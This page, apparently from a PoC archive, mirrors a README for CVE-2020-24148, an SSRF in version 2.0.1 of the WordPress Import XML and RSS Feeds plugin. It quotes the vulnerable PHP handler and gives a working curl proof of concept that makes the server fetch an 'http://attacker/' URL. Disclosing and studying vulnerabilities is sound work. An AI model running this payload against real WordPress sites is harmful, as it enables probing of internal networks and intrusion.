Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-24148 PoC — WordPress 代码问题漏洞

Source
https://github.com/dwisiswant0/CVE-2020-24148
Associated Vulnerability
Title:WordPress 代码问题漏洞 (CVE-2020-24148)
Description:WordPress是WordPress(Wordpress)基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress的import-xml-feed存在安全漏洞,该漏洞源于WordPress的导入XML和RSS源(import-xml-feed)插件2.0.1版本中的服务器端请求伪造(SSRF),通过 moove_read_xml 操作中的数据参数。
Description
CVE-2020-24148 Proof-of-Concept
Readme
# CVE-2020-24148

Server-side request forgery (SSRF) in the Import XML and RSS Feeds _(import-xml-feed)_ plugin **2.0.1** for WordPress via the `data` parameter in a `moove_read_xml` action.

## Vulnerable code:

`/moove-actions.php`:

```php
...
	public function moove_read_xml() {

		$args = array(
			'data' 		=> esc_sql( wp_unslash( $_POST['data'] ) ),
			'xmlaction'	=> sanitize_text_field( wp_unslash( $_POST['xmlaction'] ) ),
			'type'		=> sanitize_text_field( wp_unslash( $_POST['type'] ) ),
			'node'		=> sanitize_text_field( wp_unslash( $_POST['node'] ) ),
		);
		$move_importer = new Moove_Importer_Controller;
		$read_xml = $move_importer->moove_read_xml( $args );
		echo $read_xml;
		die();
	}
```

`/controllers/moove-controller.php`:

```php
class Moove_Importer_Controller {
	...
    public function moove_importer_get_content( $url ) {
        /* gets the data from a URL */

        $ch = curl_init();
        $timeout = 5;
        $user_agent = "Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0";

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_USERAGENT,$user_agent);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION,true);
        curl_setopt($ch, CURLOPT_AUTOREFERER, 1);   
        curl_setopt($ch, CURLOPT_COOKIEFILE, '');
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        $data = curl_exec($ch);

        $errors = curl_error($ch);
        $response = curl_getinfo($ch, CURLINFO_HTTP_CODE);

        curl_close($ch);

        return $data;
    }
    public function moove_read_xml( $args ) {
        $return_array = array();
        $parent       = false;
        if ( $args['type'] === 'url' ) :
            $xml_string = Moove_Importer_Controller::moove_importer_get_content( $args['data'] );
            $xml_string = htmlspecialchars_decode( $xml_string );
    ...
```

## Proof-of-Concept

```bash
$ curl \
	-s "http://host/wp-admin/admin-ajax.php?action=moove_read_xml" \
	-d "type=url&data=http%3A%2F%2Fattacker%2F&xmlaction=preview&node=0"
```

## References

- [Nuclei templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2020/CVE-2020-24148.yaml)
- [import-xml-feed:2.0.1](https://plugins.svn.wordpress.org/import-xml-feed/tags/2.0.1/)
File Snapshot

 [4.0K]  /data/pocs/ef883e51e2266cb65a224abbd93af4003aa2c1e2
└── [2.3K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.